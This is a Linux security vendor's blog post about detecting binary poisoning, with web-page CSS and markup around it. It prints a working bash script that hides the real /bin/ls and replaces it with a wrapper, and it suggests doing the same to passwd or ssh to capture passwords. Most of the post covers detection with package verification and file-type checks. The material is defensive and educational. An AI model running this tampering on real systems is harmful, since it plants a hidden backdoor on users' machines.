rgba(0,0,0,.07);cursor:pointer;margin-left:1em;position:relative;transition:background .25s ease,opacity .25s ease;z-index:6}.ss--menu__item--button:focus,.ss--menu__item--button:hover{background:#0cf0d5}.ss--menu__item--button:active{background:#0be1c8}.ss--menu__item--button .ss--menu__link{font-size:1.125rem;line-height:normal;padding:.6em 1.5em}.ss--menu__item--button .ss--menu__link:focus,.ss--menu__item--button .ss--menu__link:hover{opacity:1}.ss--menu__item--button .ss--menu__link--parent{color:#2b2b2e}.ss--menu__link{align-items:center;color:currentColor;display:flex;font-size:1rem;font-weight:600;letter-spacing:.09375rem;line-height:1;padding:.5em 1em;position:relative;text-decoration:none;transition:color .25s ease,opacity .25s ease;z-index:2}.ss--menu__link:focus,.ss--menu__link:hover{opacity:.8}@media screen and (min-width:87.5em){.ss--menu__link{font-size:1.125rem}}.ss--menu__link>svg{font-size:1rem;height:1em;margin-left:.125rem;width:1em}.ss--menu__link--parent{color:#21f4db}.ss--menu-icon{align-items:center;background:none;border:0;color:currentColor;display:flex;font-size:3.125rem;overflow:visible;padding:0}.ss--menu-icon svg{font-size:var(--header-button-size);height:1em;width:1em}.ss--menu-item{display:block;margin:0;position:relative}.ss--menu-item__back,.ss--menu-item__icon{height:1em}.ss--menu-item__back{margin-right:.5rem}.ss--menu-item a,.ss--menu-item button{cursor:pointer;padding:.5rem 0}.ss--menu-item--is-mobile a,.ss--menu-item--is-mobile button{font-weight:600;padding:.75rem 0}.ss--menu-item--is-mobile a>span,.ss--menu-item--is-mobile button>span{align-items:center;display:flex;justify-content:space-between}.ss--menu-item--is-mobile a>span>span,.ss--menu-item--is-mobile button>span>span{align-items:center;display:flex}.ss--menu-item--is-mobile a>span svg,.ss--menu-item--is-mobile button>span svg{font-size:2rem}.ss--menu-item--is-back a>span,.ss--menu-item--is-back 
button>span{justify-content:normal;margin-left:-.4285714286rem}.ss--menu-item--is-back a>span>span,.ss--menu-item--is-back button>span>span{line-height:1;margin-left:.375rem}.ss--menu-item--is-back .ss--menu-item--active,.ss--menu-item--is-back .ss--menu-item--current{--button-bg-color:#2b2b2e}.ss--menu-item--active,.ss--menu-item--current{--button-text-color:#1ec7b3;--button-bg-color:transparent;--button-bg-hover:transparent;--button-bg-active:transparent}.ss--pagination{align-items:center;display:flex;justify-content:space-between;margin:0 auto;max-width:73.125rem;padding:0 1.25rem}@media screen and (min-width:75em){.ss--pagination{justify-content:normal;padding:0}}.ss--pagination__next,.ss--pagination__previous{align-items:center;display:flex}.ss--pagination a{color:#2b2b2e}.ss--pagination a:not(:first-of-type):not(:last-of-type){padding:0 1.25rem}.ss--pagination a:first-of-type{padding:0 1.25rem 0 0}.ss--pagination a:last-of-type{padding:0 0 0 1.25rem}.ss--pagination a>svg{font-size:1.5rem;height:1em;width:1em}.ss--pagination a[aria-current]{color:#21f4db}.ss--post-card__image-frame{position:relative}.ss--post-card__logo{bottom:1.25rem;left:1.25rem;position:absolute}.ss--post-card__content{padding:1.25rem}.ss--post-card__tags{color:#c3c4c9;display:block;margin-bottom:1rem;margin-top:.25rem}.ss--post-card__tags>*{border:2px solid;border-radius:1em;display:inline-block;font-size:.875rem;line-height:1;padding:.25em 1em}.ss--post-card__meta{font-weight:600;margin-bottom:.5rem}.ss--post-card__excerpt{flex-grow:1}.ss--post-card__title.ss--post-card__title.ss--post-card__title{margin-bottom:.25rem}.ss--post-card__title.ss--post-card__title.ss--post-card__title>a{color:currentColor}.ss--post-intro__date,.ss--post-intro__tags,.ss--post-intro__tags>a{font-weight:500}.ss--post-intro__meta 
dt{clip:rect(0,0,0,0)!important;border:0!important;height:1px!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:1px!important}.ss--post-intro__meta dd,.ss--post-intro__meta dl{display:inline-block}.ss--post-intro__meta dd{font-weight:600;margin:0}.ss--post-intro__meta dl:not(:first-child):before{color:#21f4db;content:"·";display:inline-block;margin:0 .5em}.ss--post-intro__tag.ss--post-intro__tag{border:2px solid;border-radius:1em;display:inline-block;font-size:.875rem;line-height:1;padding:.25em 1em}.ss--slider{margin:0 auto;max-width:49.25rem}.ss--slider input[type=range]{-moz-appearance:none;-webkit-appearance:none;background:#f6f6f8;border-radius:.25rem;height:6px;margin:.9375rem 0;outline:none;width:100%}.ss--slider input[type=range]::-webkit-slider-thumb{-webkit-appearance:none;background:linear-gradient(135deg,#21f4db 40%,#91d0ff);border-radius:50em;box-shadow:0 .1875rem .375rem 0 hsla(0,0%,8%,.08),0 .1875rem .375rem 0 hsla(0,0%,8%,.08);cursor:pointer;height:1rem;width:1rem}.ss--slider input[type=range]::-moz-range-thumb{-webkit-appearance:none;background:linear-gradient(135deg,#21f4db 40%,#91d0ff);border-radius:50em;box-shadow:0 .1875rem .375rem 0 hsla(0,0%,8%,.08),0 .1875rem .375rem 0 hsla(0,0%,8%,.08);cursor:pointer;height:1rem;width:1rem}.ss--slider input[type=range]::-ms-thumb{-webkit-appearance:none;background:linear-gradient(135deg,#21f4db 40%,#91d0ff);border-radius:50em;box-shadow:0 .1875rem .375rem 0 hsla(0,0%,8%,.08),0 .1875rem .375rem 0 hsla(0,0%,8%,.08);cursor:pointer;height:1rem;margin-top:0;width:1rem}.ss--slider__number{margin:0 auto;max-width:20%}.ss--slider__number input{-webkit-appearance:none;appearance:none;border:2px solid;border-radius:.25rem;box-sizing:border-box;display:block;height:2.8125rem;margin-top:.3125rem;padding:.75em 1em;width:100%}.ss--slider__number input::placeholder{opacity:.4}.ss--slider__price{padding-top:1.25rem}.ss--slider 
label{clip:rect(0,0,0,0)!important;border:0!important;height:1px!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:1px!important}.ss--share{color:#1ec7b3}.ss--share svg{font-size:2.1875rem;height:1em;width:1em}.ss--share svg:focus,.ss--share svg:hover{color:#0cf0d5}.ss--share button{align-items:center}.ss--share button:first-child:nth-last-child(n+4),.ss--share button:first-child:nth-last-child(n+4)~button{margin-top:1.25rem}.ss--share button:not(:last-child){margin-right:1.25rem}.ss--share button,.ss--share__icons{display:flex;flex-direction:row}.ss--share__icons{margin:auto 0}.ss--share__heading{color:#141414;font-size:1.575rem;line-height:1.4;margin:0 0 .625rem}.ss--spacer{padding:1.25rem 0;position:relative}.ss--spacer--padding-double{padding:2.5rem 0}.ss--table{align-content:center;display:flex;margin:0;max-width:calc(100vw - 2.5rem);overflow-x:scroll;table-layout:fixed;text-align:left}@media screen and (min-width:75em){.ss--table{overflow:hidden}}.ss--table__good{fill:#21f4db}.ss--table__bad{fill:#f44336}.ss--table__na{fill:#c3c4c9;opacity:.5}.ss--table table{border-collapse:collapse;margin:auto;width:100%}.ss--table thead{font-family:Inter,Arial,sans-serif;font-size:1.5rem;text-align:center}.ss--table thead th{border-bottom:2px solid #c3c4c9;font-weight:400;text-align:center}.ss--table td,.ss--table th{border-bottom:1px solid #f6f6f8;min-width:10rem;padding:1rem}@media print,screen and (min-width:64em){.ss--table td,.ss--table th{max-width:100%;min-width:2rem;white-space:normal}}.ss--table tbody{margin:0 1rem}.ss--table tbody tr{border-bottom:1px solid #c3c4c9}.ss--table tbody tr:last-of-type{border-bottom:unset}.ss--table tbody tr th:first-child{font-weight:600;text-align:left}@media print,screen and (min-width:64em){.ss--table tbody tr th:first-child{font-size:1.5rem}}.ss--table tbody tr td{text-align:center}.ss--table tfoot td{border-bottom:0}.ss--table__wrapper{margin:0 auto 
1.25rem;max-width:90rem;padding:0;width:100%}.ss--table--widthsmall .ss--table__wrapper{max-width:48rem}.ss--table--width-medium .ss--table__wrapper{max-width:73.125rem}.ss--table--width-large .ss--table__wrapper{max-width:90rem}.ss--table--gutters{margin:auto;max-width:calc(100vw - 2.5rem)}.ss--table--bordered{border:2px solid;border-radius:.25rem}.ss--table--bordered .ss--table__wrapper{margin-bottom:0}.ss--testimonial{text-align:center}.ss--testimonial blockquote{margin:0 0 1.25rem}@media screen and (min-width:75em){.ss--testimonial blockquote{margin-bottom:1.25rem;margin-left:initial;margin-right:initial;margin-top:initial}}.ss--testimonial__citation cite{color:#141414}.ss--testimonial__author{margin-bottom:.4166666667rem}.ss--testimonial__author,.ss--testimonial__company,.ss--testimonial__role{display:block}.ss--testimonial__company,.ss--testimonial__role{font-weight:400}.ss--testimonial__cite{margin-bottom:1.25rem}.ss--testimonial__image{margin:0 auto 1.25rem;width:6.25rem}.ss--testimonial__image img{border-radius:50em}.ss--textarea{padding-bottom:1.25rem}.ss--textarea textarea{-webkit-appearance:none;border:2px solid;border-radius:.25rem;box-sizing:border-box;display:block;margin-top:.3125rem;max-width:100%;min-height:11.25rem;min-width:100%;padding:.75em 1em}.ss--textarea textarea::placeholder{opacity:.4}.ss--textarea label{clip:rect(0,0,0,0)!important;border:0!important;height:1px!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:1px!important}.ss--video{display:flex;flex-direction:column;justify-content:center;position:relative}.ss--video>div{height:0!important;overflow:hidden;padding-bottom:56.25%;padding-top:35px;position:relative;width:unset!important}.ss--video iframe{border-radius:.5rem;height:100%;left:0;position:absolute;top:0;width:100%}.ss--video--elevated>div{box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px 
rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07)}.ss--video-with-content{display:flex;flex-direction:column-reverse;gap:1.25rem;margin:0 auto;max-width:73.125rem}@media print,screen and (min-width:64em){.ss--video-with-content{display:grid;gap:2.5rem;grid-template-columns:repeat(2,1fr)}}.ss--video-with-content--gutters{padding-left:1.25rem;padding-right:1.25rem}@media screen and (min-width:75em){.ss--video-with-content--gutters{padding-left:0;padding-right:0}}.ss--video-with-content--video-left>div{grid-row:1/2}.ss--video-with-content--video-left>div:first-of-type{grid-column:2/3}.ss--video-with-content--video-left>div:last-of-type{grid-column:1/2}.ss--card{text-align:center}.ss--card__content{padding:2.5rem}:root{--surface-bg:#fff}.ss--surface{background:var(--surface-bg);background-image:linear-gradient(135deg,#21f4db 40%,#91d0ff);border-radius:.5rem;height:100%;overflow:hidden}.ss--document-cta .ss--surface{overflow:visible}.ss--surface--primary{background-image:linear-gradient(135deg,#21f4db 40%,#91d0ff);color:#141414}.ss--surface--secondary{--surface-bg:#c3c4c9 color:$black}.ss--surface--white{background:#fff}.ss--surface--black,.ss--surface--white{border:2px solid #141414;box-shadow:inset 0 1px 63px 0 rgba(0,0,0,.05)}.ss--surface--black{--surface-bg:#141414;background-image:none;color:#fff}.ss--surface--slate{background:#2b2b2e;box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07);color:#fff}.ss--surface--default{background:#f6f6f8;color:#141414}.ss--surface--default,.ss--surface--none{box-shadow:inset 0 1px 63px 0 rgba(0,0,0,.05)}.ss--surface--border,.ss--surface--none{background:transparent}.ss--surface--border{background:linear-gradient(var(--surface-bg),var(--surface-bg)) padding-box,linear-gradient(45deg,#91d0ff,#9a94f5) border-box;border:2px solid 
transparent;box-shadow:none}.ss--surface--pattern{position:relative}.ss--surface--pattern:before{background:url(/bg-pattern.svg) repeat-y 240% 104%;content:" ";display:block;inset:0;pointer-events:none;position:absolute}@media print,screen and (min-width:43.75em){.ss--surface--small-only{background:unset;border:unset;box-shadow:unset}}@media screen and (max-width:43.74875em){.ss--surface--medium-up{background:unset;border:unset;box-shadow:unset}}.ss--surface--elevated{box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07)}.ss--profile{color:#141414;font-size:1rem;margin:1.25rem auto}.ss--profile__wrapper{align-items:stretch;display:flex;flex-direction:column}@media print,screen and (min-width:43.75em){.ss--profile__wrapper{flex-direction:row}}.ss--profile__images{align-items:center;display:flex;justify-content:flex-start;margin-bottom:.625rem;position:relative}@media print,screen and (min-width:43.75em){.ss--profile__images{align-items:center;flex-direction:row;min-width:10rem;padding-left:0}}.ss--profile__greeting{font-style:italic}.ss--profile__image,.ss--profile__logo{border-radius:50%;overflow:hidden}.ss--profile__image{margin:0;position:relative}.ss--profile__logo:nth-child(2){margin-left:.625rem}@media print,screen and (min-width:43.75em){.ss--profile__content{padding:0 1.25rem;text-align:left}}.ss--profile__content p:last-child{margin-bottom:0}.ss--profile__name,.ss--profile__role{margin-bottom:.25em}.ss--profile__role{line-height:1.2}.ss--profile__bio{font-size:.875rem}.ss--profile--staff{background:#c3c4c9;border-radius:.5rem;box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07);color:#fff;height:calc(100% - 
</style><title data-gatsby-head="true">Detecting Linux Binary File Poisoning | Sandfly Security</title></head><body><div id="___gatsby"><div style="outline:none" tabindex="-1" id="gatsby-focus-wrapper"><div id="layout" class="layout"><div class="layout__content"><main><nav class="ss--breadcrumbs" aria-label="Breadcrumb"><ul class="ss--breadcrumbs__list"><li class="ss--breadcrumbs__item"><a href="/blog/">Blog</a></li><li class="ss--breadcrumbs__item" aria-current="page"><a aria-current="page" class="" 
href="/blog/detecting-linux-binary-file-poisoning/">Detecting Linux Binary File Poisoning</a></li></ul></nav><div class="ss--content ss--content--gutters ss--content--text-align-left ss--content--width-small ss--content--improved-typography"><div class="ss--spacer "></div><div><h1>Detecting Linux Binary File Poisoning</h1><p class="ss--post-intro__tags"><a class="ss--post-intro__tag" href="/blog/tag/malware/">Malware</a> <a class="ss--post-intro__tag" href="/blog/tag/rootkits/">Rootkits</a> <a class="ss--post-intro__tag" href="/blog/tag/linux-security/">Linux Security</a> <a class="ss--post-intro__tag" href="/blog/tag/linux-forensics/">Linux Forensics</a></p><div class="ss--post-intro__meta"><dl class="ss--post-intro__date"><dt>Date</dt><dd>June 13, 2018</dd></dl><dl><dt>Author</dt><dd>The Sandfly Security Team</dd></dl></div></div><div class="ss--spacer "></div><div class="MuiBox-root css-1qm1lh"><div class="ss--image ss--image--elevated ss--image--width-medium ss--image--lightbox"><div data-gatsby-image-wrapper="" class="gatsby-image-wrapper gatsby-image-wrapper-constrained ss--image__image"><div style="max-width:768px;display:block"><img alt="" role="presentation" aria-hidden="true" src="data:image/svg+xml;charset=utf-8,%3Csvg height=&#x27;432&#x27; width=&#x27;768&#x27; xmlns=&#x27;http://www.w3.org/2000/svg&#x27; version=&#x27;1.1&#x27;%3E%3C/svg%3E" style="max-width:100%;display:block;position:static"/></div><img aria-hidden="true" data-placeholder-image="" style="opacity:1;transition:opacity 500ms linear" decoding="async" src="" alt=""/><img data-gatsby-image-ssr="" data-main-image="" style="opacity:0" sizes="(min-width: 768px) 768px, 100vw" decoding="async" loading="lazy" data-src="https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;fit=crop&amp;w=768" data-srcset="https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;dpr=0.25&amp;fit=crop&amp;w=768 
192w,https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;dpr=0.5&amp;fit=crop&amp;w=768 384w,https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;fit=crop&amp;w=768 768w" alt="poison bottle graphic"/><noscript><img data-gatsby-image-ssr="" data-main-image="" style="opacity:0" sizes="(min-width: 768px) 768px, 100vw" decoding="async" loading="lazy" src="https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;fit=crop&amp;w=768" srcSet="https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;dpr=0.25&amp;fit=crop&amp;w=768 192w,https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;dpr=0.5&amp;fit=crop&amp;w=768 384w,https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;fit=crop&amp;w=768 768w" alt="poison bottle graphic"/></noscript><script type="module">const t="undefined"!=typeof HTMLImageElement&&"loading"in HTMLImageElement.prototype;if(t){const t=document.querySelectorAll("img[data-main-image]");for(let e of t){e.dataset.src&&(e.setAttribute("src",e.dataset.src),e.removeAttribute("data-src")),e.dataset.srcset&&(e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset"));const t=e.parentNode.querySelectorAll("source[data-srcset]");for(let e of t)e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset");e.complete&&(e.style.opacity=1,e.parentNode.parentNode.querySelector("[data-placeholder-image]").style.opacity=0)}}</script></div><div class="ss--image__zoom"><button class="MuiButtonBase-root MuiIconButton-root MuiIconButton-colorInherit MuiIconButton-sizeMedium css-1deacqj" tabindex="0" type="button"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M505 442.7L405.3 343c-4.5-4.5-10.6-7-17-7H372c27.6-35.3 44-79.7 44-128C416 93.1 322.9 0 208 0S0 93.1 0 208s93.1 208 
208 208c48.3 0 92.7-16.4 128-44v16.3c0 6.4 2.5 12.5 7 17l99.7 99.7c9.4 9.4 24.6 9.4 33.9 0l28.3-28.3c9.4-9.4 9.4-24.6.1-34zM208 336c-70.7 0-128-57.2-128-128 0-70.7 57.2-128 128-128 70.7 0 128 57.2 128 128 0 70.7-57.2 128-128 128z"></path></svg></button></div></div></div><p>Let’s talk about Linux binary poisoning.</p><p>Binary poisoning is tampering with a system command and replacing it with a malicious version. This can be a wholesale replacement with a new file designed to act like the old command, or tampering with the in-place executable so it runs malicious code directly.</p><p>Why does this matter? Well if you poison a command, and an unsuspecting user runs that command, then you can execute code as that user. Here’s an example output from a poisoned <em>ls</em> command:</p><pre><code>root@example:~# ls -al /bin
total 16060
drwxr-xr-x 4 root root 4096 Jun 12 22:17 .
drwxr-xr-x 23 root root 4096 Jun 12 22:15 ..
-rwxr-xr-x 1 root root 1037528 May 16 2017 bash
drwxr-xr-x 2 root root 4096 Jun 12 22:17 .bin
-rwxr-xr-x 1 root root 520992 Jun 15 2017 btrfs
-rwxr-xr-x 1 root root 249464 Jun 15 2017 btrfs-calc-size
lrwxrwxrwx 1 root root 5 Jun 15 2017 btrfsck -&gt; btrfs
-rwxr-xr-x 1 root root 278376 Jun 15 2017 btrfs-convert
-rwxr-xr-x 1 root root 249464 Jun 15 2017 btrfs-debug-tree
-rwxr-xr-x 1 root root 245368 Jun 15 2017 btrfs-find-root
-rwxr-xr-x 1 root root 270136 Jun 15 2017 btrfs-image
-rwxr-xr-x 1 root root 249464 Jun 15 2017 btrfs-map-logical
-rwxr-xr-x 1 root root 245368 Jun 15 2017 btrfs-select-super
-rwxr-xr-x 1 root root 253816 Jun 15 2017 btrfs-show-super
-rwxr-xr-x 1 root root 249464 Jun 15 2017 btrfstune
-rwxr-xr-x 1 root root 245368 Jun 15 2017 btrfs-zero-log
-rwxr-xr-x 3 root root 31288 May 20 2015 bunzip2
-rwxr-xr-x 1 root root 1964536 Aug 19 2015 busybox
-rwxr-xr-x 3 root root 31288 May 20 2015 bzcat
lrwxrwxrwx 1 root root 6 May 20 2015 bzcmp -&gt; bzdiff
-rwxr-xr-x 1 root root 2140 May 20 2015 bzdiff
...
-rwxr-xr-x 1 root root 89 Jun 12 22:17 ls
...
-rwxr-xr-x 1 root root 5764 Oct 27 2014 zdiff
-rwxr-xr-x 1 root root 140 Oct 27 2014 zegrep
-rwxr-xr-x 1 root root 140 Oct 27 2014 zfgrep
-rwxr-xr-x 1 root root 2131 Oct 27 2014 zforce
-rwxr-xr-x 1 root root 5938 Oct 27 2014 zgrep
-rwxr-xr-x 1 root root 2037 Oct 27 2014 zless
-rwxr-xr-x 1 root root 1910 Oct 27 2014 zmore
-rwxr-xr-x 1 root root 5047 Oct 27 2014 znew
POISONED /bin/ls active!
root@example:~#</code></pre><p>Here the <em>ls</em> command worked as normal, but when it completed it printed the text <strong>“POISONED /bin/ls active!”</strong> to the console. What we’ve done here is replace the normal <em>ls</em> command with a script that runs arbitrary commands along with <em>ls</em>. Look closely and the listing already gives it away: <em>ls</em> is only 89 bytes, which is script-sized rather than binary-sized, and it shares its Jun 12 22:17 timestamp with the hidden <em>.bin</em> directory and with <em>/bin</em> itself.</p><h2>How to Poison a Binary</h2><p>Let’s look at the script used to poison the <em>ls</em> command. <strong>Do not run this on a production system.</strong> Spin up a disposable virtual host to beat on when tampering with core system commands!</p><pre><code>#!/usr/bin/env bash
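# Linux binary poisoning example.
# Based on backdoorme poison script.
# Lab demonstration only: run it on a disposable virtual host, never on a production system.

echo &quot;Poisoning ls command.&quot;
echo &quot;Making backup of ls to /bin/ls.bak&quot;
# Take the backup only when none exists yet, so a second run cannot
# overwrite the saved original with the already-poisoned script.
if [ ! -f /bin/ls.bak ]; then
    cp /bin/ls /bin/ls.bak
fi

# The hidden directory created here is one of the two artifacts the
# detection sections of this article look for.
echo &quot;Making /bin/.bin to hold original binary&quot;
mkdir /bin/.bin
echo &quot;Moving original binary to /bin/.bin&quot;
mv /bin/ls /bin/.bin/

# /bin/ls becomes a three-line shell script; that is why file(1) later
# reports it as a script instead of an ELF executable.
echo &quot;Creating poisoned ls script in /bin&quot;
echo &quot;#!/bin/bash&quot; &gt; /bin/ls
echo &quot;( ls &amp; ) &gt; /dev/null 2&gt;&amp;1 &amp;&amp; /bin/.bin/ls \$@&quot; &gt;&gt; /bin/ls
echo &quot;echo \&quot;POISONED /bin/ls active!\&quot;&quot; &gt;&gt; /bin/ls
chmod +x /bin/ls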

echo &quot;Done&quot;</code></pre><p>Let’s go over what is going on here:</p><ol><li><p>We make a backup of <em>/bin/ls</em> so you can back out the changes this script made easily for the demo.</p></li><li><p>We make a hidden directory called <em>/bin/.bin</em> to hold the original command.</p></li><li><p>We move the original <em>/bin/ls</em> to <em>/bin/.bin/ls</em>.</p></li><li><p>We now create a new script as <em>/bin/ls</em>. This script has the following in it:</p></li></ol><pre><code>#!/bin/bash
( ls &amp; ) &gt; /dev/null 2&gt;&amp;1 &amp;&amp; /bin/.bin/ls $@
echo &quot;POISONED /bin/ls active!&quot;</code></pre><ol start="5"><li><p>We set executable permission on this script and exit.</p></li></ol><p>The new <em>/bin/ls</em> script takes the command line arguments and sends them to the real hidden <em>/bin/.bin/ls</em> command. Everything else in the script runs on each invocation too, which in this demo is the <em>echo</em> that prints our message.</p><p>Of course we don’t have to send a message. We could do all sorts of things such as check for your UID and execute commands as you, open a new backdoor, <a href="/blog/linux-malware-persistence-with-cron/">insert new persistence commands</a> in <em>cron</em>, etc. The list is endless. Every time you run <em>ls</em> our malicious commands will run.</p><p>We don’t even have to use <em>ls</em> of course. We could use <em>passwd</em>, <em>ssh</em>, or other critical system commands to grab passwords and help us gain access to other hosts as you do your normal activity. There are other ways to spice this up, but we’ll leave it to your imagination.</p><h2>Manually Finding Poisoned Commands on Linux</h2><p>Finding poisoned commands is quite time consuming if you want to do it by hand. For instance, just on Ubuntu under the <em>/bin</em> and <em>/sbin</em> directories there are easily 500+ commands. If you throw in <em>/usr/bin</em> and <em>/usr/sbin</em> you are at thousands of commands. So, the first thing to try is to run package verification to speed up the process.</p><p>Package verification will be one of the following depending on your version of Linux:</p><pre><code>Redhat based

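# A 5 in the third column of rpm -V output marks a file whose digest no longer
# matches the package database. The pattern is quoted so the shell passes it to
# grep unchanged, including in shells that treat ^ as an extended-glob operator.
rpm -Va | grep '^..5.'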

Debian/Ubuntu based

debsums -c</code></pre><p>Running the <em>debsums</em> command on the affected Ubuntu host immediately shows a problem:</p><pre><code>root@example:~# debsums -c
/bin/ls</code></pre><p>Package verification relies on the package database and tools stored on the same host, so an intruder with root access can alter them as well; a clean result does not clear the system. If package verification shows nothing, the next step is to run the <em>file</em> command against your core system binary directories and look for any files that are not ELF executables. Yes, an attacker can replace a binary with another compiled binary. However, a shell replacement is the easiest to pull off and doesn’t require an attacker loading up any pre-compiled files or source code that may break or alter the system too much (loading the full gcc compiler may be noticed).</p><p>The command below will show us any command that is not a compiled executable. It also will ignore any file that is a link to another file, so symbolic links need to be checked separately:</p><pre><code>file /bin/* | grep -v ELF | grep -v link</code></pre><pre><code>root@example:~# file /bin/* | grep -v ELF | grep -v link
/bin/bzdiff: POSIX shell script, ASCII text executable
/bin/bzexe: POSIX shell script, ASCII text executable
/bin/bzgrep: POSIX shell script, ASCII text executable
/bin/bzmore: POSIX shell script, ASCII text executable
/bin/egrep: POSIX shell script, ASCII text executable
/bin/fgrep: POSIX shell script, ASCII text executable
/bin/fsck.btrfs: POSIX shell script, ASCII text executable
/bin/gunzip: POSIX shell script, ASCII text executable
/bin/gzexe: POSIX shell script, ASCII text executable
/bin/lesspipe: POSIX shell script, ASCII text executable
/bin/ls: Bourne-Again shell script, ASCII text executable
/bin/red: POSIX shell script, ASCII text executable
/bin/setupcon: POSIX shell script, UTF-8 Unicode text executable
/bin/uncompress: POSIX shell script, ASCII text executable
/bin/unicode_start: POSIX shell script, ASCII text executable
/bin/which: POSIX shell script, ASCII text executable
/bin/zcat: POSIX shell script, ASCII text executable
/bin/zcmp: POSIX shell script, ASCII text executable
/bin/zdiff: POSIX shell script, ASCII text executable
/bin/zegrep: POSIX shell script, ASCII text executable
/bin/zfgrep: POSIX shell script, ASCII text executable
/bin/zforce: POSIX shell script, ASCII text executable
/bin/zgrep: POSIX shell script, ASCII text executable
/bin/zless: POSIX shell script, ASCII text executable
/bin/zmore: POSIX shell script, ASCII text executable
/bin/znew: POSIX shell script, ASCII text executable
root@example:~#</code></pre><p>Looking at the above you’ll have to eyeball anything that looks suspicious. It is perfectly normal for some commands to be scripts, but in the above the <em>ls</em> command is listed as a script and that is definitely not normal.</p><p>If you suspect a command may be poisoned, look at it directly with the <em>strings</em> command to see if anything pops out. <strong>Do not run </strong><em><strong>strace</strong></em><strong> on any file you think may be malicious.</strong> We put that in bold because some people may want to try the <em>strace</em> command, but <em>strace</em> runs the actual executable file on the host, which is a really bad idea.</p><p>You can also use a standard file integrity monitor to spot this kind of activity if you set it up to avoid a lot of false alarms.</p><h2>Automatically Finding Poisoned Commands on Linux</h2><p>This is the Sandfly blog, so we’re going to show you how Sandfly’s automated agentless intrusion detection can spot this kind of attack easily. 
Here is what a host with a poisoned <em>/bin/ls</em> like above will show in Sandfly:</p><img src="https://www.datocms-assets.com/56687/1635216304-poisoned-linux-binary-alarms.png?auto=format&amp;fit=crop&amp;w=768" alt="Sandfly Poisoned Linux Binary Alarms" width="768" height="215" loading="lazy" decoding="async"/><p>What’s that? We have <em>two</em> alarms here. The first was our poisoned binary alert, but what about the hidden directory? Did you miss it? It’s easy to miss something like that. Go up above and look at the directory listing again and notice this:</p><pre><code>root@example:~# ls -al /bin 
total 16060 
drwxr-xr-x 4 root root 4096 Jun 12 22:17 . 
drwxr-xr-x 23 root root 4096 Jun 12 22:15 .. 
-rwxr-xr-x 1 root root 1037528 May 16 2017 bash 
drwxr-xr-x 2 root root 4096 Jun 12 22:17 .bin
...</code></pre><p>That’s an alert on a weird hidden directory at <em>/bin/.bin</em> with a timestamp identical to our malicious <em>ls</em>: both show Jun 12 22:17 in the listing, which is the modification time that <em>ls -l</em> prints.</p><p>Hidden directories under system binary areas are very suspicious. If you missed this when looking at that <em>ls</em> output, you can be sure Sandfly didn’t. Sandfly is very good at seeing suspicious activity like this.</p><p>Let’s look first at the hidden directory:</p><img src="https://www.datocms-assets.com/56687/1635216314-poisoned-linux-binary-hidden-directory.png?auto=format&amp;fit=crop&amp;w=768" alt="Poisoned Linux Binary Hidden Directory" width="768" height="424" loading="lazy" decoding="async"/><p>That’s pretty straightforward. There is a hidden directory under <em>/bin</em> that looks really strange. Now let’s look at the main alarm:</p><img src="https://www.datocms-assets.com/56687/1635216322-poisoned-linux-binary-sandfly-alert.png?auto=format&amp;fit=crop&amp;w=768" alt="Poisoned Linux Binary Sandfly Alert" width="768" height="430" loading="lazy" decoding="async"/><p>Here’s the star attraction. The binary <em>/bin/ls</em> is in fact not a binary at all. It’s an unknown type (text in this case). 
Sandfly also gives you the file creation times and other data to help you narrow down exactly when it happened and what accounts may have been involved.</p><p>You now have enough information to begin an investigation on this box.</p><h2>Dormant vs. Active Attacks</h2><p>File binary poisoning is a classic case of a dormant attack. This is a lot different than something active on your host like a malicious process. Dormant attacks just lie around like a booby trap waiting to go off. They are very good at going unnoticed because they are not doing anything suspicious until run.</p><p>Sandfly always searches for both active and dormant attacks. The latest Sandfly update 1.1.18 can now also spot binary poisoning before it becomes a major headache.</p><p>Time is your enemy when your systems are compromised. Sandfly has checks in the standard rotation that constantly look for things out of place like poisoned binaries or suspicious directories. We hunt for intruders 24 hours a day on your Linux hosts for you. Best of all, we do it without needing to load agents on your endpoints by using our agentless technology. 
<a href="/product/why-sandfly/">Learn more today</a></p><hr/></div></main></div></div></div></div>
          <script
            id="gatsby-chunk-mapping"
          >
